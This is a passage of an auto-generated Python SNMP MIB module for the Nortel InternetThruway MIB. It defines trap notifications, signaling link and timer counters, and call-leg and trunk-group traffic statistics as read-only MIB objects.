csgComplexStateTrapMajor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4034)).setObjects(("InternetThruway-MIB", "cplxName"), ("InternetThruway-MIB", "cplxLocEthernetName"), ("InternetThruway-MIB", "cplxLocEthernetIP"), ("InternetThruway-MIB", "cplxLocOperationalState"), ("InternetThruway-MIB", "cplxLocStandbyState"), ("InternetThruway-MIB", "cplxLocAvailabilityState"), ("InternetThruway-MIB", "cplxMateEthernetName"), ("InternetThruway-MIB", "cplxMateEthernetIP"), ("InternetThruway-MIB", "cplxMateOperationalState"), ("InternetThruway-MIB", "cplxMateStandbyState"), ("InternetThruway-MIB", "cplxMateAvailabilityState"), ("InternetThruway-MIB", "cplxAlarmStatus"))
if mibBuilder.loadTexts: csgComplexStateTrapMajor.setDescription('This trap is generated when any of the state values change Severity is determined only by the operational and standby states of both servers.')
csgComplexStateTrapCritical = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4035)).setObjects(("InternetThruway-MIB", "cplxName"), ("InternetThruway-MIB", "cplxLocEthernetName"), ("InternetThruway-MIB", "cplxLocEthernetIP"), ("InternetThruway-MIB", "cplxLocOperationalState"), ("InternetThruway-MIB", "cplxLocStandbyState"), ("InternetThruway-MIB", "cplxLocAvailabilityState"), ("InternetThruway-MIB", "cplxMateEthernetName"), ("InternetThruway-MIB", "cplxMateEthernetIP"), ("InternetThruway-MIB", "cplxMateOperationalState"), ("InternetThruway-MIB", "cplxMateStandbyState"), ("InternetThruway-MIB", "cplxMateAvailabilityState"), ("InternetThruway-MIB", "cplxAlarmStatus"))
if mibBuilder.loadTexts: csgComplexStateTrapCritical.setDescription('This trap is generated when any of the state values change Severity is determined only by the operational and standby states of both servers.')
cisRetrievalFailureTrapMajor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4044))
if mibBuilder.loadTexts: cisRetrievalFailureTrapMajor.setDescription('This trap is generated when the TruCluster ASE information retrieval attempts failed repeatedly. ')
genericNormal = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9001)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapGenericStr1"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: genericNormal.setDescription('The Trap generated for generic normal priority text messages')
genericWarning = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9002)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapGenericStr1"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: genericWarning.setDescription('The Trap generated for generic warning priority text messages')
genericMinor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9003)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapGenericStr1"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: genericMinor.setDescription('The Trap generated for generic minor priority text messages')
genericMajor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9004)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapGenericStr1"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: genericMajor.setDescription('The Trap generated for generic major priority text messages')
genericCritical = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9005)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapGenericStr1"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: genericCritical.setDescription('The Trap generated for generic critical priority text messages')
hgStatusClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9011)).setObjects(("InternetThruway-MIB", "hgKey"), ("InternetThruway-MIB", "hgIndex"), ("InternetThruway-MIB", "hgName"), ("InternetThruway-MIB", "hgIPAddress"), ("InternetThruway-MIB", "hgAlarmTimeStamp"))
if mibBuilder.loadTexts: hgStatusClear.setDescription('The Trap generated when a Home Gateway Status returns to normal after having previously been in the failed status.')
hgStatusAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9014)).setObjects(("InternetThruway-MIB", "hgKey"), ("InternetThruway-MIB", "hgIndex"), ("InternetThruway-MIB", "hgName"), ("InternetThruway-MIB", "hgIPAddress"), ("InternetThruway-MIB", "hgAlarmTimeStamp"))
if mibBuilder.loadTexts: hgStatusAlarm.setDescription('The Trap generated when a Home Gateway is indicated to be failed.')
nasStatusClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9021)).setObjects(("InternetThruway-MIB", "nasKey"), ("InternetThruway-MIB", "nasIndex"), ("InternetThruway-MIB", "nasName"), ("InternetThruway-MIB", "nasIPAddress"), ("InternetThruway-MIB", "nasAlarmTimeStamp"), ("InternetThruway-MIB", "nasCmplxName"))
if mibBuilder.loadTexts: nasStatusClear.setDescription('The Trap generated when a rapport registers after having previously been in the failed status.')
nasStatusAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,9024)).setObjects(("InternetThruway-MIB", "nasKey"), ("InternetThruway-MIB", "nasIndex"), ("InternetThruway-MIB", "nasName"), ("InternetThruway-MIB", "nasIPAddress"), ("InternetThruway-MIB", "nasAlarmTimeStamp"), ("InternetThruway-MIB", "nasCmplxName"))
if mibBuilder.loadTexts: nasStatusAlarm.setDescription('The Trap generated when a Nas is indicated to be failed.')
linkOMTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1), )
if mibBuilder.loadTexts: linkOMTable.setStatus('mandatory')
if mibBuilder.loadTexts: linkOMTable.setDescription('The LinkTable contains information about each signaling link on the CSG')
linkOMTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "linksetIndex"), (0, "InternetThruway-MIB", "linkIndex"))
if mibBuilder.loadTexts: linkOMTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: linkOMTableEntry.setDescription('An entry in the LinkTable. Indexed by linkIndex')
linkOMId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkOMId.setStatus('mandatory')
if mibBuilder.loadTexts: linkOMId.setDescription('The id of the link.')
linkOMSetId = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkOMSetId.setStatus('mandatory')
if mibBuilder.loadTexts: linkOMSetId.setDescription('The id of the linkset.')
linkFailures = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkFailures.setStatus('mandatory')
if mibBuilder.loadTexts: linkFailures.setDescription('Number of times this signaling link has failed.')
linkCongestions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkCongestions.setStatus('mandatory')
if mibBuilder.loadTexts: linkCongestions.setDescription('Number of times this signaling link has Congested.')
linkInhibits = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkInhibits.setStatus('mandatory')
if mibBuilder.loadTexts: linkInhibits.setDescription('Number of times this signaling link has been inhibited.')
linkTransmittedMSUs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkTransmittedMSUs.setStatus('mandatory')
if mibBuilder.loadTexts: linkTransmittedMSUs.setDescription('Number of messages sent on this signaling link.')
linkReceivedMSUs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkReceivedMSUs.setStatus('mandatory')
if mibBuilder.loadTexts: linkReceivedMSUs.setDescription('Number of messages received on this signaling link.')
linkRemoteProcOutages = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 1, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: linkRemoteProcOutages.setStatus('mandatory')
if mibBuilder.loadTexts: linkRemoteProcOutages.setDescription('Number of times the remote processor outgaes have been reported.')
bLATimerExpiries = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 2, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bLATimerExpiries.setStatus('mandatory')
if mibBuilder.loadTexts: bLATimerExpiries.setDescription('Number of times the BLA timer has expired.')
rLCTimerExpiries = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 2, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rLCTimerExpiries.setStatus('mandatory')
if mibBuilder.loadTexts: rLCTimerExpiries.setDescription('Number of times the RLC timer has expired.')
uBATimerExpiries = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 2, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: uBATimerExpiries.setStatus('mandatory')
if mibBuilder.loadTexts: uBATimerExpiries.setDescription('Number of times the UBA timer has expired.')
rSATimerExpiries = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 2, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rSATimerExpiries.setStatus('mandatory')
if mibBuilder.loadTexts: rSATimerExpiries.setDescription('Number of times the RSA timer has expired.')
outCallAttempts = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: outCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: outCallAttempts.setDescription('Total number of outgoing call legs attempted.')
outCallNormalCompletions = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: outCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: outCallNormalCompletions.setDescription('Total number of outgoing call legs completed normally.')
outCallAbnormalCompletions = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: outCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: outCallAbnormalCompletions.setDescription('Total number of outgoing call legs completed abnormally.')
userBusyOutCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: userBusyOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: userBusyOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to user busy signal.')
tempFailOutCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tempFailOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: tempFailOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to temporary failure.')
userUnavailableOutCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: userUnavailableOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: userUnavailableOutCallRejects.setDescription('Total number of outgoing call legs failed due to user not available.')
abnormalReleaseOutCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: abnormalReleaseOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: abnormalReleaseOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to abnormal release.')
otherOutCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: otherOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: otherOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to other reasons.')
cumulativeActiveOutCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cumulativeActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: cumulativeActiveOutCalls.setDescription('Cumulatvie Number of outgoing call legs active so far.')
currentlyActiveOutCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveOutCalls.setDescription('Total Number of outgoing call legs currently active.')
currentlyActiveDigitalOutCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveDigitalOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveDigitalOutCalls.setDescription('Total Number of outgoing digital call legs currently active.')
currentlyActiveAnalogOutCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveAnalogOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveAnalogOutCalls.setDescription('Total Number of outgoing analog call legs currently active.')
inCallAttempts = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: inCallAttempts.setDescription('Total number of incoming call legs attempted.')
inCallNormalCompletions = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: inCallNormalCompletions.setDescription('Total number of incoming call legs completed normally.')
inCallAbnormalCompletions = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: inCallAbnormalCompletions.setDescription('Total number of incoming call legs completed abnormally.')
userBusyInCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 16), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: userBusyInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: userBusyInCallRejects.setDescription('Total Number of incoming call legs rejected due to user busy signal.')
tempFailInCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 17), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: tempFailInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: tempFailInCallRejects.setDescription('Total Number of incoming call legs rejected due to temporary failure.')
userUnavailableInCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 18), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: userUnavailableInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: userUnavailableInCallRejects.setDescription('Total number of incoming call legs failed due to user not available.')
abnormalReleaseInCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 19), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: abnormalReleaseInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: abnormalReleaseInCallRejects.setDescription('Total Number of incoming call legs rejected due to abnormal release.')
otherInCallRejects = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: otherInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: otherInCallRejects.setDescription('Total Number of incoming call legs rejected due to other reasons.')
cumulativeActiveInCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 21), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cumulativeActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: cumulativeActiveInCalls.setDescription('Cumulatvie Number of incoming call legs active so far.')
currentlyActiveInCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 22), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveInCalls.setDescription('Total Number of incoming call legs currently active.')
currentlyActiveDigitalInCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 23), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveDigitalInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveDigitalInCalls.setDescription('Total Number of incoming digital call legs currently active.')
currentlyActiveAnalogInCalls = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 3, 24), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentlyActiveAnalogInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: currentlyActiveAnalogInCalls.setDescription('Total Number of incoming analog call legs currently active.')
trunkCallOMTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1), )
if mibBuilder.loadTexts: trunkCallOMTable.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCallOMTable.setDescription('The TrunkCallOMTable contains call related OMs on a trunk group basis')
trunkCallOMTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "trunkCallOMIndex"))
if mibBuilder.loadTexts: trunkCallOMTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCallOMTableEntry.setDescription('An entry in the TrunkCallOMTable. Indexed by trunkCallOMIndex.')
trunkCallOMIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: trunkCallOMIndex.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCallOMIndex.setDescription('Identifies a trunk group index.')
trunkGroupCLLI = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkGroupCLLI.setStatus('mandatory')
if mibBuilder.loadTexts: trunkGroupCLLI.setDescription('The Common Language Location Identifier(CLLI), a unique alphanumeric value to identify this Trunk Group.')
numberOfCircuits = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: numberOfCircuits.setStatus('mandatory')
if mibBuilder.loadTexts: numberOfCircuits.setDescription('Total Number of Circuits provisioned against this trunk group.')
trunkOutCallAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOutCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOutCallAttempts.setDescription('Total number of outgoing call legs attempted.')
trunkOutCallNormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOutCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOutCallNormalCompletions.setDescription('Total number of outgoing call legs completed normally.')
trunkOutCallAbnormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOutCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOutCallAbnormalCompletions.setDescription('Total number of outgoing call legs completed abnormally.')
trunkUserBusyOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkUserBusyOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkUserBusyOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to user busy signal.')
trunkTempFailOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkTempFailOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkTempFailOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to temporary failure.')
trunkUserUnavailableOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkUserUnavailableOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkUserUnavailableOutCallRejects.setDescription('Total number of outgoing call legs failed due to user not available.')
trunkAbnormalReleaseOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkAbnormalReleaseOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkAbnormalReleaseOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to abnormal release.')
trunkOtherOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOtherOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOtherOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to other reasons.')
trunkCumulativeActiveOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCumulativeActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCumulativeActiveOutCalls.setDescription('Cumulatvie Number of outgoing call legs active so far.')
trunkCurrentlyActiveOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveOutCalls.setDescription('Total Number of outgoing call legs currently active.')
trunkCurrentlyActiveDigitalOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveDigitalOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveDigitalOutCalls.setDescription('Total Number of outgoing digital call legs currently active.')
trunkCurrentlyActiveAnalogOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveAnalogOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveAnalogOutCalls.setDescription('Total Number of outgoing analog call legs currently active.')
trunkInCallAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 16), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkInCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: trunkInCallAttempts.setDescription('Total number of incoming call legs attempted.')
trunkInCallNormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 17), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkInCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: trunkInCallNormalCompletions.setDescription('Total number of incoming call legs completed normally.')
trunkInCallAbnormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 18), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkInCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: trunkInCallAbnormalCompletions.setDescription('Total number of incoming call legs completed abnormally.')
trunkUserBusyInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 19), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkUserBusyInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkUserBusyInCallRejects.setDescription('Total Number of incoming call legs rejected due to user busy signal.')
trunkTempFailInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkTempFailInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkTempFailInCallRejects.setDescription('Total Number of incoming call legs rejected due to temporary failure.')
trunkUserUnavailableInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 21), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkUserUnavailableInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkUserUnavailableInCallRejects.setDescription('Total number of incoming call legs failed due to user not available.')
trunkAbnormalReleaseInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 22), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkAbnormalReleaseInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkAbnormalReleaseInCallRejects.setDescription('Total Number of incoming call legs rejected due to abnormal release.')
trunkOtherInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 23), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOtherInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOtherInCallRejects.setDescription('Total Number of incoming call legs rejected due to other reasons.')
trunkCumulativeActiveInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 24), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCumulativeActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCumulativeActiveInCalls.setDescription('Cumulatvie Number of incoming call legs active so far.')
trunkCurrentlyActiveInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 25), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveInCalls.setDescription('Total Number of incoming call legs currently active.')
trunkCurrentlyActiveDigitalInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 26), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveDigitalInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveDigitalInCalls.setDescription('Total Number of incoming digital call legs currently active.')
trunkCurrentlyActiveAnalogInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 27), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkCurrentlyActiveAnalogInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkCurrentlyActiveAnalogInCalls.setDescription('Total Number of incoming analog call legs currently active.')
trunkAllActiveCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 28), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkAllActiveCalls.setStatus('mandatory')
if mibBuilder.loadTexts: trunkAllActiveCalls.setDescription('Total number of currently active call legs (all type).')
trunkOccupancyPerCCS = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 29), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trunkOccupancyPerCCS.setStatus('mandatory')
if mibBuilder.loadTexts: trunkOccupancyPerCCS.setDescription('Trunk occupancy in Centum Call Seconds.')
trafficInCCSs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 30), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trafficInCCSs.setStatus('mandatory')
if mibBuilder.loadTexts: trafficInCCSs.setDescription('Scanned om for tgms that are call busy')
trafficInCCSIncomings = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 31), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: trafficInCCSIncomings.setStatus('mandatory')
if mibBuilder.loadTexts: trafficInCCSIncomings.setDescription('Scanned Om on tgms with an incoming call.')
localBusyInCCSs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 32), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: localBusyInCCSs.setStatus('mandatory')
if mibBuilder.loadTexts: localBusyInCCSs.setDescription('Scanned om for tgms that are locally blocked.')
remoteBusyInCCSs = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 4, 1, 1, 33), Counter32()).setMaxAccess("readonly")
